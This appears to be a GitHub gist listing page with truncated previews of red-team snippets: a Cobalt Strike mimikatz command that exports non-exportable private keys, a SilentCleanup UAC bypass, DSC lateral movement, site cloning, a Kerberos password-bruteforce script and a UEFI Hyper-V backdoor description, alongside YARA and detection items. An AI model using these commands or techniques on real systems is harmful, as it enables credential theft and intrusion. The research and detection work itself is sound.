James Hovious JamesHovious

tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
# cmd separator is |
# practical example: export machine certificates (including non-exportable private key :)):
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
makelariss /
Last active June 17, 2021 21:13
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to
SilentCleanup has a "Highest" RunLevel, meaning it will elevate the scheduled task to administrator without any prompting.
It also contains environment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe); the environment variables are stored in the HKCU registry hive, which is write-accessible by a user (HKCU\Environment).
We can perform an AlwaysNotify UAC Bypass by changing the environment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
Mr-Un1k0d3r /
Created November 7, 2017 16:14
Lazy website cloning
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
mattifestation / WDAG_CI_Policy.xml
Created October 18, 2017 21:59
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="" xmlns:xsi="" xmlns="urn:schemas-microsoft-com:sipolicy">
curi0usJack / .htaccess
Last active June 3, 2023 10:19
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
# Include /etc/apache2/redirect.rules
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active November 10, 2022 21:52
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Ticket Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
williballenthin / stackstrings.yara
Last active March 15, 2023 21:27
match x86 that appears to be stack string creation
rule stack_strings
author = "William Ballenthin"
email = ""
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
Cr4sh / DmaHvBackdoor.c
Last active February 20, 2023 08:21
Hyper-V backdoor for UEFI
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which is called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit, winload.efi
transfers execution to the previously loaded Hyper-V kernel (hvix64.sys)
ropnop /
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful